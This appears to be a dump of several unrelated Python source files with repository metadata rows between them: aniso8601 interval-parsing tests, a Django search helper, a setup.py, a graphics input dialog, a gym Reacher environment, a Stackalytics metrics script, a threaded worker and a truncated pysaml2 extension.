expectedargs = {'end': (('1981', '04', '05', None, None, None, 'date'),
('01', '01', '00', None, 'time'), 'datetime'),
'duration':(None, '1', None, None, None, None, None,
'duration')}
mockBuilder.build_interval.return_value = expectedargs
result = parse_interval('P1M/1981-04-05T01:01:00', builder=mockBuilder)
self.assertEqual(result, expectedargs)
mockBuilder.build_interval.assert_called_once_with(**expectedargs)
mockBuilder = mock.Mock()
expectedargs = {'start': ('2014', '11', '12', None, None, None,
'date'),
'duration': (None, None, None, None, '1', None, None,
'duration')}
mockBuilder.build_interval.return_value = expectedargs
result = parse_interval('2014-11-12/PT1H', builder=mockBuilder)
self.assertEqual(result, expectedargs)
mockBuilder.build_interval.assert_called_once_with(**expectedargs)
mockBuilder = mock.Mock()
expectedargs = {'start': (('1980', '03', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'end': (('1981', '04', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime')}
mockBuilder.build_interval.return_value = expectedargs
result = parse_interval('1980-03-05T01:01:00/1981-04-05T01:01:00',
builder=mockBuilder)
self.assertEqual(result, expectedargs)
mockBuilder.build_interval.assert_called_once_with(**expectedargs)
def test_parse_interval_relative(self):
with mock.patch.object(aniso8601.builder.RelativeTimeBuilder,
'build_interval') as mockBuildInterval:
expectedargs = {'end': (('1981', '04', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'duration': (None, '1', None, None, None, None,
None, 'duration')}
mockBuildInterval.return_value = expectedargs
result = parse_interval('P1M/1981-04-05T01:01:00', relative=True)
self.assertEqual(result, expectedargs)
mockBuildInterval.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.RelativeTimeBuilder,
'build_interval') as mockBuildInterval:
expectedargs = {'start': ('2014', '11', '12', None, None, None,
'date'),
'duration': (None, None, None, None, '1', None,
None, 'duration')}
mockBuildInterval.return_value = expectedargs
result = parse_interval('2014-11-12/PT1H', relative=True)
self.assertEqual(result, expectedargs)
mockBuildInterval.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.RelativeTimeBuilder,
'build_interval') as mockBuildInterval:
expectedargs = {'start': (('1980', '03', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'end': (('1981', '04', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime')}
mockBuildInterval.return_value = expectedargs
result = parse_interval('1980-03-05T01:01:00/1981-04-05T01:01:00',
relative=True)
self.assertEqual(result, expectedargs)
mockBuildInterval.assert_called_once_with(**expectedargs)
def test_parse_interval_repeating(self):
#Parse interval can't parse repeating intervals
with self.assertRaises(ISOFormatError):
parse_interval('R3/1981-04-05/P1D')
with self.assertRaises(ISOFormatError):
parse_interval('R3/1981-04-05/P0003-06-04T12:30:05.5')
with self.assertRaises(ISOFormatError):
parse_interval('R/PT1H2M/1980-03-05T01:01:00')
def test_parse_interval_suffixgarbage(self):
#Don't allow garbage after the duration
#https://bitbucket.org/nielsenb/aniso8601/issues/9/durations-with-trailing-garbage-are-parsed
with self.assertRaises(ValueError):
parse_interval('2001/P1Dasdf', builder=None)
with self.assertRaises(ValueError):
parse_interval('P1Dasdf/2001', builder=None)
with self.assertRaises(ValueError):
parse_interval('2001/P0003-06-04T12:30:05.5asdfasdf', builder=None)
with self.assertRaises(ValueError):
parse_interval('P0003-06-04T12:30:05.5asdfasdf/2001', builder=None)
class TestRepeatingIntervalParserFunctions(unittest.TestCase):
def test_parse_repeating_interval(self):
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_repeating_interval') as mockBuilder:
expectedargs = {'R': False, 'Rnn': '3',
'interval': (('1981', '04', '05', None, None, None,
'date'),
None,
(None, None, None, '1', None, None,
None, 'duration'),
'interval')}
mockBuilder.return_value = expectedargs
result = parse_repeating_interval('R3/1981-04-05/P1D')
self.assertEqual(result, expectedargs)
mockBuilder.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_repeating_interval') as mockBuilder:
expectedargs = {'R': False, 'Rnn': '11',
'interval': (None,
(('1980', '03', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(None, None, None, None, '1', '2',
None, 'duration'),
'interval')}
mockBuilder.return_value = expectedargs
result = parse_repeating_interval('R11/PT1H2M/1980-03-05T01:01:00')
self.assertEqual(result, expectedargs)
mockBuilder.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_repeating_interval') as mockBuilder:
expectedargs = {'R': False, 'Rnn': '2',
'interval': ((('1980', '03', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(('1981', '04', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
None,
'interval')}
mockBuilder.return_value = expectedargs
result = parse_repeating_interval('R2--1980-03-05T01:01:00--'
'1981-04-05T01:01:00',
intervaldelimiter='--')
self.assertEqual(result, expectedargs)
mockBuilder.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_repeating_interval') as mockBuilder:
expectedargs = {'R': False, 'Rnn': '2',
'interval': ((('1980', '03', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(('1981', '04', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
None,
'interval')}
mockBuilder.return_value = expectedargs
result = parse_repeating_interval('R2/'
'1980-03-05 01:01:00/'
'1981-04-05 01:01:00',
datetimedelimiter=' ')
self.assertEqual(result, expectedargs)
mockBuilder.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.PythonTimeBuilder,
'build_repeating_interval') as mockBuilder:
expectedargs = {'R': True, 'Rnn': None,
'interval': (None,
(('1980', '03', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(None, None, None, None, '1', '2',
None, 'duration'),
'interval')}
mockBuilder.return_value = expectedargs
result = parse_repeating_interval('R/PT1H2M/1980-03-05T01:01:00')
self.assertEqual(result, expectedargs)
mockBuilder.assert_called_once_with(**expectedargs)
def test_parse_repeating_interval_mockbuilder(self):
mockBuilder = mock.Mock()
args = {'R': False, 'Rnn': '3',
'interval': (('1981', '04', '05', None, None, None,
'date'),
None,
(None, None, None, '1', None, None,
None, 'duration'),
'interval')}
mockBuilder.build_repeating_interval.return_value = args
result = parse_repeating_interval('R3/1981-04-05/P1D',
builder=mockBuilder)
self.assertEqual(result, args)
mockBuilder.build_repeating_interval.assert_called_once_with(**args)
mockBuilder = mock.Mock()
args = {'R': False, 'Rnn': '11',
'interval': (None,
(('1980', '03', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(None, None, None, None, '1', '2',
None, 'duration'),
'interval')}
mockBuilder.build_repeating_interval.return_value = args
result = parse_repeating_interval('R11/PT1H2M/1980-03-05T01:01:00',
builder=mockBuilder)
self.assertEqual(result, args)
mockBuilder.build_repeating_interval.assert_called_once_with(**args)
mockBuilder = mock.Mock()
args = {'R': True, 'Rnn': None,
'interval': (None,
(('1980', '03', '05', None, None, None,
'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(None, None, None, None, '1', '2',
None, 'duration'),
'interval')}
mockBuilder.build_repeating_interval.return_value = args
result = parse_repeating_interval('R/PT1H2M/1980-03-05T01:01:00',
builder=mockBuilder)
self.assertEqual(result, args)
mockBuilder.build_repeating_interval.assert_called_once_with(**args)
def test_parse_repeating_interval_relative(self):
with mock.patch.object(aniso8601.builder.RelativeTimeBuilder,
'build_repeating_interval') as mockBuild:
expectedargs = {'R': False, 'Rnn': '3',
'interval': (('1981', '04', '05', None, None, None,
'date'),
None,
(None, None, None, '1', None, None,
None, 'duration'),
'interval')}
mockBuild.return_value = expectedargs
result = parse_repeating_interval('R3/1981-04-05/P1D', relative=True)
self.assertEqual(result, expectedargs)
mockBuild.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.RelativeTimeBuilder,
'build_repeating_interval') as mockBuild:
expectedargs = {'R': False, 'Rnn': '11',
'interval': (None,
(('1980', '03', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(None, None, None, None, '1', '2',
None, 'duration'),
'interval')}
mockBuild.return_value = expectedargs
result = parse_repeating_interval('R11/'
'PT1H2M/'
'1980-03-05T01:01:00',
relative=True)
self.assertEqual(result, expectedargs)
mockBuild.assert_called_once_with(**expectedargs)
with mock.patch.object(aniso8601.builder.RelativeTimeBuilder,
'build_repeating_interval') as mockBuild:
expectedargs = {'R': True, 'Rnn': None,
'interval': (None,
(('1980', '03', '05', None, None,
None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
(None, None, None, None, '1', '2',
None, 'duration'),
'interval')}
mockBuild.return_value = expectedargs
result = parse_repeating_interval('R/'
'PT1H2M/'
'1980-03-05T01:01:00',
relative=True)
self.assertEqual(result, expectedargs)
mockBuild.assert_called_once_with(**expectedargs)
def test_parse_repeating_interval_suffixgarbage(self):
#Don't allow garbage after the duration
#https://bitbucket.org/nielsenb/aniso8601/issues/9/durations-with-trailing-garbage-are-parsed
with self.assertRaises(ISOFormatError):
parse_repeating_interval('R3/1981-04-05/P1Dasdf', builder=None)
with self.assertRaises(ISOFormatError):
parse_repeating_interval('R3/'
'1981-04-05/'
'P0003-06-04T12:30:05.5asdfasdf',
builder=None)
def test_parse_interval_internal(self):
#Test the internal _parse_interval function
testtuples = (('P1M/1981-04-05T01:01:00',
{'end': (('1981', '04', '05', None, None, None, 'date'),
('01', '01', '00', None, 'time'), 'datetime'),
'duration': (None, '1', None, None, None, None, None,
'duration')}),
('P1M/1981-04-05',
{'end': ('1981', '04', '05', None, None, None, 'date'),
'duration': (None, '1', None, None, None, None, None,
'duration')}),
('P1.5Y/2018-03-06',
{'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': ('1.5', None, None, None, None, None, None,
'duration')}),
('PT1H/2014-11-12',
{'end': ('2014', '11', '12', None, None, None, 'date'),
'duration': (None, None, None, None, '1', None, None,
'duration')}),
('PT4H54M6.5S/2014-11-12',
{'end': ('2014', '11', '12', None, None, None, 'date'),
'duration': (None, None, None, None, '4', '54', '6.5',
'duration')}),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
('PT0.0000001S/2018-03-06',
{'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'0.0000001', 'duration')}),
('PT2.0000048S/2018-03-06',
{'end': ('2018', '03', '06', None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'2.0000048', 'duration')}),
('1981-04-05T01:01:00/P1M1DT1M',
{'start': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00', None, 'time'),
'datetime'),
'duration': (None, '1', None,
'1', None, '1', None, 'duration')}),
('1981-04-05/P1M1D',
{'start': ('1981', '04', '05',
None, None, None, 'date'),
'duration': (None, '1', None,
'1', None, None, None, 'duration')}),
('2018-03-06/P2.5M',
{'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, '2.5', None,
None, None, None, None, 'duration')}),
('2014-11-12/PT1H',
{'start': ('2014', '11', '12',
None, None, None, 'date'),
'duration': (None, None, None,
None, '1', None, None, 'duration')}),
('2014-11-12/PT4H54M6.5S',
{'start': ('2014', '11', '12',
None, None, None, 'date'),
'duration': (None, None, None,
None, '4', '54', '6.5', 'duration')}),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
('2018-03-06/PT0.0000001S',
{'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'0.0000001', 'duration')}),
('2018-03-06/PT2.0000048S',
{'start': ('2018', '03', '06',
None, None, None, 'date'),
'duration': (None, None, None,
None, None, None,
'2.0000048', 'duration')}),
('1980-03-05T01:01:00/1981-04-05T01:01:00',
{'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime')}),
('1980-03-05T01:01:00/1981-04-05',
{'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime'),
'end': ('1981', '04', '05',
None, None, None, 'date')}),
('1980-03-05/1981-04-05T01:01:00',
{'start': ('1980', '03', '05',
None, None, None, 'date'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('01', '01', '00',
None, 'time'), 'datetime')}),
('1980-03-05/1981-04-05',
{'start': ('1980', '03', '05',
None, None, None, 'date'),
'end': ('1981', '04', '05',
None, None, None, 'date')}),
('1981-04-05/1980-03-05',
{'start': ('1981', '04', '05',
None, None, None, 'date'),
'end': ('1980', '03', '05',
None, None, None, 'date')}),
#Make sure we truncate, not round
#https://bitbucket.org/nielsenb/aniso8601/issues/10/sub-microsecond-precision-in-durations-is
('1980-03-05T01:01:00.0000001/'
'1981-04-05T14:43:59.9999997',
{'start': (('1980', '03', '05',
None, None, None, 'date'),
('01', '01', '00.0000001',
None, 'time'), 'datetime'),
'end': (('1981', '04', '05',
None, None, None, 'date'),
('14', '43', '59.9999997', None, 'time'),
'datetime')}))
for testtuple in testtuples:
mockBuilder = mock.Mock()
mockBuilder.build_interval.return_value = testtuple[1]
result = _parse_interval(testtuple[0], mockBuilder)
self.assertEqual(result, testtuple[1])
mockBuilder.build_interval.assert_called_once_with(**testtuple[1])
#Test different separators
expectedargs = {'start': (('1980', '03', '05',
None, None, None,
'date'),
('01', '01', '00',
None, 'time'),
'datetime'),
'end': (('1981', '04', '05',
None, None, None,
'date'),
('01', '01', '00',
None, 'time'),
'datetime')}
mockBuilder = mock.Mock()
mockBuilder.build_interval.return_value = expectedargs
result = _parse_interval('1980-03-05T01:01:00--1981-04-05T01:01:00',
mockBuilder,
intervaldelimiter='--')
self.assertEqual(result, expectedargs)
mockBuilder.build_interval.assert_called_once_with(**expectedargs)
expectedargs = {'start': (('1980', '03', '05',
None, None, None,
'date'),
('01', '01', '00',
None, 'time'),
'datetime'),
'end': (('1981', '04', '05',
None, None, None,
'date'),
('01', '01', '00',
None, 'time'),
'datetime')}
mockBuilder = mock.Mock()
mockBuilder.build_interval.return_value = expectedargs
_parse_interval('1980-03-05 01:01:00/1981-04-05 01:01:00',
mockBuilder,
datetimedelimiter=' ')
self.assertEqual(result, expectedargs)
mockBuilder.build_interval.assert_called_once_with(**expectedargs)
| 50.629482
| 115
| 0.387027
| 37,665
| 0.98796
| 0
| 0
| 0
| 0
| 0
| 0
| 8,591
| 0.225344
|
420d64c40f09249f80d51908d10b8e6dab472942
| 3,008
|
py
|
Python
|
cool/core/utils.py
|
007gzs/django-cool
|
3b4ed1a8ca020e6f798ca47e20169e5a854b4f24
|
[
"BSD-3-Clause"
] | 11
|
2020-05-19T09:52:35.000Z
|
2022-02-25T10:39:56.000Z
|
cool/core/utils.py
|
007gzs/django-cool
|
3b4ed1a8ca020e6f798ca47e20169e5a854b4f24
|
[
"BSD-3-Clause"
] | null | null | null |
cool/core/utils.py
|
007gzs/django-cool
|
3b4ed1a8ca020e6f798ca47e20169e5a854b4f24
|
[
"BSD-3-Clause"
] | 1
|
2020-12-24T08:14:58.000Z
|
2020-12-24T08:14:58.000Z
|
# encoding: utf-8
import operator
from functools import reduce
from django.core.exceptions import FieldDoesNotExist
from django.db.models import Q
from django.db.models.constants import LOOKUP_SEP
def split_camel_name(name, fall=False):
"""
驼峰命名分割为单词
GenerateURLs => [Generate, URLs]
generateURLsLite => [generate, URLs, Lite]
"""
if not name:
return []
lastest_upper = name[0].isupper()
idx_list = []
for idx, char in enumerate(name):
upper = char.isupper()
# rising
if upper and not lastest_upper:
idx_list.append(idx)
# falling
elif fall and not upper and lastest_upper:
idx_list.append(idx-1)
lastest_upper = upper
l_idx = 0
name_items = []
for r_idx in idx_list:
if name[l_idx:r_idx]:
name_items.append(name[l_idx:r_idx])
l_idx = r_idx
if name[l_idx:]:
name_items.append(name[l_idx:])
return name_items
def construct_search(queryset, field_name):
"""
生成搜索关键字
"""
if field_name.startswith('^'):
return "%s__istartswith" % field_name[1:]
elif field_name.startswith('='):
return "%s__iexact" % field_name[1:]
# Use field_name if it includes a lookup.
opts = queryset.model._meta
lookup_fields = field_name.split(LOOKUP_SEP)
# Go through the fields, following all relations.
prev_field = None
for path_part in lookup_fields:
if path_part == 'pk':
path_part = opts.pk.name
try:
field = opts.get_field(path_part)
except FieldDoesNotExist:
# Use valid query lookups.
if prev_field and prev_field.get_lookup(path_part):
return field_name
else:
prev_field = field
if hasattr(field, 'get_path_info'):
# Update opts to follow the relation.
opts = field.get_path_info()[-1].to_opts
# Otherwise, use the field with icontains.
return "%s__icontains" % field_name
def get_search_results(queryset, search_term, search_fields, model):
"""
Return a tuple containing a queryset to implement the search
and a boolean indicating if the results may contain duplicates.
"""
try:
from django.contrib.admin.utils import (
lookup_needs_distinct as lookup_spawns_duplicates,
)
except ImportError:
from django.contrib.admin.utils import lookup_spawns_duplicates
use_distinct = False
if search_fields and search_term:
orm_lookups = [construct_search(queryset, str(search_field)) for search_field in search_fields]
for bit in search_term.split():
or_queries = [Q(**{orm_lookup: bit}) for orm_lookup in orm_lookups]
queryset = queryset.filter(reduce(operator.or_, or_queries))
use_distinct |= any(lookup_spawns_duplicates(model._meta, search_spec) for search_spec in orm_lookups)
return queryset, use_distinct
| 31.663158
| 110
| 0.648936
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 607
| 0.199671
|
420dab6ca09e09f7cbafe716ac539156b5dcaa62
| 773
|
py
|
Python
|
setup.py
|
atait/klayout-gadgets
|
a8d9655e547fc4531982bbe55e632009bad39096
|
[
"MIT"
] | 13
|
2018-12-02T23:32:29.000Z
|
2022-02-11T19:28:49.000Z
|
setup.py
|
atait/klayout-gadgets
|
a8d9655e547fc4531982bbe55e632009bad39096
|
[
"MIT"
] | 3
|
2019-01-15T23:59:59.000Z
|
2020-12-04T16:30:48.000Z
|
setup.py
|
atait/klayout-gadgets
|
a8d9655e547fc4531982bbe55e632009bad39096
|
[
"MIT"
] | 1
|
2020-12-01T22:56:03.000Z
|
2020-12-01T22:56:03.000Z
|
from setuptools import setup
def readme():
with open('README.md', 'r') as fx:
return fx.read()
setup(name='lygadgets',
version='0.1.31',
description='Tools to make klayout, the standalone, and python environments work better together',
long_description=readme(),
long_description_content_type='text/markdown',
author='Alex Tait',
author_email='alexander.tait@nist.gov',
license='MIT',
packages=['lygadgets'],
install_requires=['future', 'xmltodict'],
package_data={'': ['*.lym']},
include_package_data=True,
entry_points={'console_scripts': [
'lygadgets_link=lygadgets.command_line:cm_link_any',
'lygadgets_unlink=lygadgets.command_line:cm_unlink_any',
]},
)
| 29.730769
| 104
| 0.654592
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 336
| 0.43467
|
420db9bdde8897b05f3ac2a8bb469ed44754dbb4
| 1,748
|
py
|
Python
|
Python/Zelle/Chapter10_DefiningClasses/ProgrammingExercises/16_CannonballTarget/inputDialog.py
|
jeffvswanson/CodingPractice
|
9ea8e0dd504230cea0e8684b31ef22c3ed90d2fb
|
[
"MIT"
] | null | null | null |
Python/Zelle/Chapter10_DefiningClasses/ProgrammingExercises/16_CannonballTarget/inputDialog.py
|
jeffvswanson/CodingPractice
|
9ea8e0dd504230cea0e8684b31ef22c3ed90d2fb
|
[
"MIT"
] | null | null | null |
Python/Zelle/Chapter10_DefiningClasses/ProgrammingExercises/16_CannonballTarget/inputDialog.py
|
jeffvswanson/CodingPractice
|
9ea8e0dd504230cea0e8684b31ef22c3ed90d2fb
|
[
"MIT"
] | null | null | null |
# inputDialog.py
""" Provides a window to get input values
from the user to animate a cannonball."""
from graphics import GraphWin, Entry, Text, Point
from button import Button
class InputDialog:
""" A custom window for getting simulation values (angle, velocity,
and height) from the user."""
def __init__(self, angle, vel, height):
""" Build and display the ingut window """
self.win = win = GraphWin("Initial Values", 200, 300)
win.setCoords(0, 4.5, 4, 0.5)
Text(Point(1, 1), "Angle").draw(win)
self.angle = Entry(Point(3, 1), 5).draw(win)
self.angle.setText(str(angle))
Text(Point(1, 2), "Velocity").draw(win)
self.vel = Entry(Point(3, 2), 5).draw(win)
self.vel.setText(str(vel))
Text(Point(1, 3), "Height").draw(win)
self.height = Entry(Point(3, 3), 5).draw(win)
self.height.setText(str(height))
self.fire = Button(win, Point(1, 4), 1.25, 0.5, "Fire!")
self.fire.activate()
self.quit = Button(win, Point(3, 4), 1.25, 0.5, "Quit")
self.quit.activate()
def interact(self):
""" wait for user to click Quit or Fire button
Returns a string indicating which button was clicked
"""
while True:
pt = self.win.getMouse()
if self.quit.clicked(pt):
return "Quit"
if self.fire.clicked(pt):
return "Fire!"
def getValues(self):
""" return input values """
a = float(self.angle.getText())
v = float(self.vel.getText())
h = float(self.height.getText())
return a, v, h
def close(self):
""" close the input window """
self.win.close()
| 30.137931
| 71
| 0.568078
| 1,568
| 0.897025
| 0
| 0
| 0
| 0
| 0
| 0
| 490
| 0.28032
|
420e4e16ca0ab83a3724fd3b5d5775cec3e14b0e
| 979
|
py
|
Python
|
gym_envs/envs/reacher_done.py
|
gautams3/reacher-done
|
6420f4ea3e0f6e47a3ebe25dbe170a9030b03b01
|
[
"MIT"
] | 1
|
2021-11-13T13:51:37.000Z
|
2021-11-13T13:51:37.000Z
|
gym_envs/envs/reacher_done.py
|
gautams3/reacher-done
|
6420f4ea3e0f6e47a3ebe25dbe170a9030b03b01
|
[
"MIT"
] | null | null | null |
gym_envs/envs/reacher_done.py
|
gautams3/reacher-done
|
6420f4ea3e0f6e47a3ebe25dbe170a9030b03b01
|
[
"MIT"
] | 2
|
2021-04-08T12:48:29.000Z
|
2021-05-09T02:04:33.000Z
|
import gym
from gym import error, spaces, utils
from gym.utils import seeding
from gym.envs.mujoco.reacher import ReacherEnv
import numpy as np
class ReacherDoneEnv(ReacherEnv):
metadata = {'render.modes': ['human']}
# def __init__(self):
# ...
def step(self, action):
self.do_simulation(action, self.frame_skip)
vec = self.get_body_com("fingertip")-self.get_body_com("target")
dist = np.linalg.norm(vec)
reward_dist = - dist
reward_ctrl = - 0.3 * np.square(action).sum()
reward_time = -0.2 # 5 times larger, to see the effect of time reward
done = dist < 0.04 # done if it's close enough
done_reward = 2
reward = reward_dist + reward_ctrl + reward_time + done*done_reward
ob = self._get_obs()
info = dict(reward_dist=reward_dist, reward_ctrl=reward_ctrl, dist=dist)
return ob, reward, done, info
# def reset(self):
# super().reset()
# def render(self, mode='human'):
# ...
# def close(self):
# ...
| 31.580645
| 76
| 0.668029
| 711
| 0.726251
| 0
| 0
| 0
| 0
| 0
| 0
| 259
| 0.264556
|
420ed2750c333b6a9c2bf33a7391b56504549e6c
| 4,639
|
py
|
Python
|
stackalytics/get_metric.py
|
yaoice/python_demo
|
024f42f9cfce757bdaddf24202d8547801f0e8f6
|
[
"Apache-2.0"
] | null | null | null |
stackalytics/get_metric.py
|
yaoice/python_demo
|
024f42f9cfce757bdaddf24202d8547801f0e8f6
|
[
"Apache-2.0"
] | 2
|
2021-02-08T20:17:39.000Z
|
2021-06-01T21:49:12.000Z
|
stackalytics/get_metric.py
|
yaoice/python_demo
|
024f42f9cfce757bdaddf24202d8547801f0e8f6
|
[
"Apache-2.0"
] | null | null | null |
#/usr/bin/env python
import httplib2
import json
import sys
from prettytable import PrettyTable
from config import field
class BaseStackalytics(object):
_instance = None
def __new__(cls, *args, **kwargs):
if not cls._instance:
cls._instance = super(BaseStackalytics, cls).__new__(cls, *args, **kwargs)
return cls._instance
class Stackalytics(BaseStackalytics):
def __init__(self, prefix):
super(Stackalytics, self).__init__()
self._prefix = prefix
self._http_instance = self.get_http_instance()
def get_http_instance(self):
return httplib2.Http(".cache")
def get_metrics(self, url):
try:
return self._http_instance.request(self._prefix + url,
"GET",
headers={'Accept': 'application/json'})
except httplib2.ServerNotFoundError:
print "Url {} not found".format(url)
sys.exit(1)
def main():
company_statistics = {}
engineer_statistics = {}
stackalytics = Stackalytics("http://stackalytics.com")
for project_type in field['project_type']:
company_statistics[project_type] = {}
for company in field['company']:
company_statistics[project_type][company] = {}
for metric in field['metric']:
company_statistics[project_type][company][metric] = {}
url = "/api/1.0/stats/companies?release={}&metric={}&project_type={}&company={}".format(field['release'],
metric,
project_type,
company)
resp, content = stackalytics.get_metrics(url)
stats = json.loads(content)['stats']
try:
metric_dict = stats[0]
except IndexError:
metric_dict = {'id': company, 'metric': 0}
company_statistics[project_type][company][metric] = metric_dict
for project_type in field['project_type']:
engineer_statistics[project_type] = {}
for engineer in field['engineers']['ids']:
engineer_statistics[project_type][engineer] = {}
for metric in field['metric']:
engineer_statistics[project_type][engineer][metric] = {}
engineers_url = "/api/1.0/stats/engineers?&release={}&metric={}"\
"&project_type={}&company={}&user_id={}".format(field['release'],
metric,
project_type,
field['engineers']['owercompany'],
engineer)
engineers_resp, engineers_content = stackalytics.get_metrics(engineers_url)
engineers_stats = json.loads(engineers_content)['stats']
try:
engineers_metric_dict = engineers_stats[0]
except IndexError:
engineers_metric_dict = {'id': engineer, 'metric': 0}
engineer_statistics[project_type][engineer][metric] = engineers_metric_dict
engineer_table_field = ['metric'] + [engineer for engineer in field['engineers']['ids']]
for project_type in field['project_type']:
print "{} {} project by tencent individual:".format(field['release'], project_type)
table = PrettyTable(engineer_table_field)
for metric in field['metric']:
table.add_row([metric] + [engineer_statistics[project_type][engineer][metric]['metric'] for engineer in field['engineers']['ids']])
print table
table_field = ['metric'] + [company.replace('%20', ' ') for company in field['company']]
for project_type in field['project_type']:
print "{} {} project by company:".format(field['release'], project_type)
table = PrettyTable(table_field)
for metric in field['metric']:
table.add_row([metric] + [company_statistics[project_type][company][metric]['metric'] for company in field['company']])
print table
# print company_statistics
if __name__ == '__main__':
sys.exit(main())
| 43.764151
| 143
| 0.527053
| 881
| 0.189912
| 0
| 0
| 0
| 0
| 0
| 0
| 669
| 0.144212
|
421097c0f352c62da6301188c7377f912e0f1d54
| 1,465
|
py
|
Python
|
modules/worker.py
|
strangest-quark/iConsent
|
096a471a8f5c61dcb9cff5fb380ddb55848bf055
|
[
"MIT"
] | 10
|
2020-08-08T13:59:10.000Z
|
2020-11-13T23:13:57.000Z
|
modules/worker.py
|
strangest-quark/iConsent
|
096a471a8f5c61dcb9cff5fb380ddb55848bf055
|
[
"MIT"
] | 1
|
2021-09-08T02:26:48.000Z
|
2021-09-08T02:26:48.000Z
|
modules/worker.py
|
strangest-quark/iConsent
|
096a471a8f5c61dcb9cff5fb380ddb55848bf055
|
[
"MIT"
] | 2
|
2021-07-29T07:40:59.000Z
|
2022-01-28T03:20:22.000Z
|
import logging
from queue import Queue
from threading import Thread
from time import time
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger(__name__)
class Worker(Thread):
def __init__(self, queue, out_que):
Thread.__init__(self)
self.queue = queue
self.out_que = out_que
def run(self):
while True:
# Get the work from the queue and expand the tuple
video, txnId = self.queue.get()
try:
v = video.generate_video_part(txnId)
self.out_que.put(v)
finally:
self.queue.task_done()
def main(video_obj_arr, txnId, n):
ts = time()
# Create a queue to communicate with the worker threads
queue = Queue()
out_que = Queue()
# Create 7 worker threads
for x in range(2):
worker = Worker(queue, out_que)
# Setting daemon to True will let the main thread exit even though the workers are blocking
worker.daemon = True
worker.start()
# Put the tasks into the queue as a tuple
for i in range(1, n):
logger.info('Queueing {}'.format(i))
queue.put((video_obj_arr[i-1], txnId))
# Causes the main thread to wait for the queue to finish processing all the tasks
queue.join()
logging.info('Took %s', time() - ts)
return out_que
if __name__ == '__main__':
main()
| 28.173077
| 102
| 0.619795
| 463
| 0.316041
| 0
| 0
| 0
| 0
| 0
| 0
| 429
| 0.292833
|
4212519f45b1cf9dfda4da64b4b3fae6c56b03b5
| 2,420
|
py
|
Python
|
src/saml2/extension/pefim.py
|
cnelson/pysaml2
|
a30e51c271e27e4411a0243b65adbf5d7a3abb07
|
[
"Apache-2.0"
] | 5,079
|
2015-01-01T03:39:46.000Z
|
2022-03-31T07:38:22.000Z
|
desktop/core/ext-py/pysaml2-4.4.0/src/saml2/extension/pefim.py
|
zks888/hue
|
93a8c370713e70b216c428caa2f75185ef809deb
|
[
"Apache-2.0"
] | 1,623
|
2015-01-01T08:06:24.000Z
|
2022-03-30T19:48:52.000Z
|
desktop/core/ext-py/pysaml2-4.4.0/src/saml2/extension/pefim.py
|
zks888/hue
|
93a8c370713e70b216c428caa2f75185ef809deb
|
[
"Apache-2.0"
] | 2,033
|
2015-01-04T07:18:02.000Z
|
2022-03-28T19:55:47.000Z
|
#!/usr/bin/env python
import saml2
from saml2 import SamlBase
from saml2.xmldsig import KeyInfo
NAMESPACE = 'urn:net:eustix:names:tc:PEFIM:0.0:assertion'
class SPCertEncType_(SamlBase):
"""The urn:net:eustix:names:tc:PEFIM:0.0:assertion:SPCertEncType element """
c_tag = 'SPCertEncType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{http://www.w3.org/2000/09/xmldsig#}KeyInfo'] = ('key_info',
[KeyInfo])
c_cardinality['key_info'] = {"min": 1}
c_attributes['VerifyDepth'] = ('verify_depth', 'unsignedByte', False)
c_child_order.extend(['key_info'])
def __init__(self,
key_info=None,
x509_data=None,
verify_depth='1',
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
if key_info:
